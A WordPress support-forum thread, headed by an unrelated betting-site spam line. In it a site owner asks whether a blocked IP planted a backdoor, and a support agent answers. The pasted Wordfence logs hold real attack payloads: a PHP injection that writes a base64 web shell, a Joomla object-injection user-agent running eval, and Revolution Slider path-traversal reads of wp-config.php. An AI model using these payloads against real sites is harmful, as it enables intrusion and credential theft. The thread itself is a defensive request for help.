Vip ph bet registration,Www phjl online registration.Recharge Every day and Get Bonus up-to 50%!

NilsOstergren
(@nilsostergren)

7 years, 10 months ago

Hi

A Wordfence scan on my WP site at https://goo.gl/KMHjUS found a file appearing to be malicious: wp-includes/preview.php

The text found in the file matches, according to WF, a known malicious file: “@$svLEBvhEGxBACGnbnfkbfm(“E” . “\x76” . “\x61” . “l” . “\x28” . “g” . “Z””. The infection type is: Backdoor:PHP/svLEB.

Only two visitors since the previous scan looks suspicious. The IP number of the first visitor below was already blocked in Wordfence and I’d like to know if it got in anyway.

Thanks,
/Nils

1
Wordfence: All recent hits for IP address 91.200.12.33[fghafds.com]
Time: 12 hours 10 mins ago — Fri, 20 Jan 17 01:23:23 +0000 — 1484875403.585561 in Unixtime
URL: https://example.com/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
Type: Normal request
Full Browser ID: }__test|O:21:”JDatabaseDriverMysqli”:3:{s:2:”fc”;O:17:”JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers”;a:1:{i:0;a:2:{i:0;O:9:”SimplePie”:5:{s:8:”sanitize”;O:20:”JDatabaseDriverMysql”:0:{}s:8:”feed_url”;s:46:”eval($_REQUEST[1]);JFactory::getConfig();exit;”;s:19:”cache_name_function”;s:6:”assert”;s:5:”cache”;b:1;s:11:”cache_class”;O:20:”JDatabaseDriverMysql”:0:{}}i:1;s:4:”init”;}}s:13:”\0\0\0connection”;b:1;}?
Location: Ukraine Ukraine

2
Wordfence: All recent hits for IP address 212.204.228.106[212.204.228.106]
Time: 15 hours 10 mins ago — Thu, 19 Jan 17 22:23:32 +0000 — 1484864612.414000 in Unixtime
Secs since last hit: 0.8690
URL: https://example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php
Type: Normal request
Full Browser ID: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:33.0) Gecko/20100101 Firefox/33.0
Location: Netherlands Amsterdam, Netherlands
Time: 15 hours 10 mins ago — Thu, 19 Jan 17 22:23:31 +0000 — 1484864611.545000 in Unixtime
URL: https://example.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Findex.php
Type: Normal request
Full Browser ID: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:28.0) Gecko/20100101 Firefox/28.0
Location: Netherlands Amsterdam, Netherlands

Viewing 2 replies - 1 through 2 (of 2 total)

wfalaa
(@wfalaa)

7 years, 10 months ago

Hi Nils,
None of these visits seems to be responsible for creating this file for me, you could check the timestamp for this file creation to get a better idea about when it was created, but in general, there are many other ways to infect your website with such a malicious code, check “How are they attacking my WordPress Site?” for more details.

For now, deleting this file is a must along with chekcing “How to Clean a Hacked WordPress Site using Wordfence” and “How to Secure Your WordPress Working Environment“.

Thanks.

Thread Starter NilsOstergren
(@nilsostergren)

7 years, 10 months ago

Thanks! Well, I really thought I was covered since I have taken all the precautions I can mentioned in the articles you refer to.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Did blocked IP manage to inject a file?’ is closed to new replies.